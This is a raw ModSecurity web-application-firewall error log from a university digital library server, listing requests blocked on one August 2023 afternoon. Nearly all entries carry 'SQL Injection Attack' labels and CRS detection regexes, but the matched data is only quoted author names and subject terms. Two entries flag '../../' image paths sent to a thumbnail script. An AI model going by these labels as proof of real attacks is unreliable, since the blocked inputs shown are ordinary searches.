[Mon Aug 28 16:45:54.435730 2023] [:error] [pid 47595] [client 114.119.137.146] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Catering industry\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxs0sCo-f0AALnr7RgAAAAJ"]
[Mon Aug 28 16:46:11.239539 2023] [:error] [pid 47586] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sunghae Jun\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxs48Co-f0AALni5kMAAAAG"]
[Mon Aug 28 16:50:10.656425 2023] [:error] [pid 47855] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Eric Asa\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxt0sCo-f0AALrvuk4AAAAK"]
[Mon Aug 28 16:54:13.056525 2023] [:error] [pid 47928] [client 47.128.23.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Dayana Bastos Costa\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxuxcCo-f0AALs4hgMAAAAU"]
[Mon Aug 28 16:57:53.870714 2023] [:error] [pid 47606] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Frazelle, Edward H.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxvocCo-f0AALn2OIgAAAAO"]
[Mon Aug 28 16:58:46.428803 2023] [:error] [pid 48051] [client 47.128.24.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Delay estimating\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxv1sCo-f0AALuzP14AAAAN"]
[Mon Aug 28 17:02:24.865638 2023] [:error] [pid 48126] [client 47.128.25.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Steiglitz,Kenneth\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxwsMCo-f0AALv@Xh8AAAAE"]
[Mon Aug 28 17:09:22.135972 2023] [:error] [pid 48167] [client 47.128.29.178] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Anas Chafi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxyUsCo-f0AALwngogAAAAL"]
[Mon Aug 28 17:10:05.934867 2023] [:error] [pid 48173] [client 47.128.27.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Social media presence\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxyfcCo-f0AALwt6w0AAAAO"]
[Mon Aug 28 17:13:15.817067 2023] [:error] [pid 48368] [client 47.128.31.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Cellular Manufacturing\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxzO8Co-f0AALzwAHsAAAAC"]
[Mon Aug 28 17:13:31.746966 2023] [:error] [pid 48058] [client 47.128.18.150] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/JTI.EMER.2020.018.gif.gif"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOxzS8Co-f0AALu6uwAAAAAA"]
[Mon Aug 28 17:14:10.503965 2023] [:error] [pid 48124] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Thin plate\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxzcsCo-f0AALv8DwgAAAAG"]
[Mon Aug 28 17:17:16.547272 2023] [:error] [pid 48378] [client 40.77.167.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Balanced scorecard\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx0LMCo-f0AALz6AaUAAAAB"]
[Mon Aug 28 17:26:30.546311 2023] [:error] [pid 48631] [client 47.128.20.147] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sunil Luthra\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx2VsCo-f0AAL33XDYAAAAR"]
[Mon Aug 28 17:30:37.714474 2023] [:error] [pid 48697] [client 47.128.30.234] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sherif Mostafa\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx3TcCo-f0AAL45dgsAAAAV"]
[Mon Aug 28 17:32:51.158566 2023] [:error] [pid 48652] [client 47.128.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/DAEZ01.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOx308Co-f0AAL4MnVEAAAAP"]
[Mon Aug 28 17:39:59.629239 2023] [:error] [pid 48830] [client 47.128.27.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Technology entrepreneurship\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx5f8Co-f0AAL6@lAgAAAAC"]
[Mon Aug 28 17:48:41.081282 2023] [:error] [pid 49062] [client 47.128.29.161] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Internet of Things\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx7icCo-f0AAL@m8VMAAAAT"]
[Mon Aug 28 17:51:01.064894 2023] [:error] [pid 49013] [client 47.128.27.252] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sahar Hadi Pour\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx8FcCo-f0AAL91mh0AAAAA"]
[Mon Aug 28 18:18:07.287815 2023] [:error] [pid 49262] [client 47.128.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Oguz Cimenler\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyCb8Co-f0AAMBuGMkAAAAN"]
[Mon Aug 28 18:23:13.108232 2023] [:error] [pid 49489] [client 47.128.17.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Setiawan Agus\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyDocCo-f0AAMFRxWEAAAAI"]
[Mon Aug 28 18:24:44.327091 2023] [:error] [pid 49383] [client 47.128.29.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Solid Works 3D Drafting and Design\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyD-MCo-f0AAMDnzXYAAAAE"]
[Mon Aug 28 18:30:42.807700 2023] [:error] [pid 49490] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Mastering Microsoft\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyFYsCo-f0AAMFSEI8AAAAD"]
[Mon Aug 28 18:32:22.470429 2023] [:error] [pid 49595] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sukardi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyFxsCo-f0AAMG7hxsAAAAM"]
[Mon Aug 28 18:38:13.774137 2023] [:error] [pid 49675] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nicholas Chileshe\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyHJcCo-f0AAMILTKgAAAAQ"]
[Mon Aug 28 18:39:57.560000 2023] [:error] [pid 49663] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Andi Cakravastia\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyHjcCo-f0AAMH-czMAAAAJ"]
[Mon Aug 28 18:42:43.992523 2023] [:error] [pid 49626] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Norhidayah Abdul Hassan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyIM8Co-f0AAMHaSakAAAAC"]
[Mon Aug 28 18:43:01.293264 2023] [:error] [pid 49626] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Electronic journals\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyIRcCo-f0AAMHaSbYAAAAC"]
[Mon Aug 28 18:44:51.609317 2023] [:error] [pid 49813] [client 47.128.29.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Gusman Nawanir\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 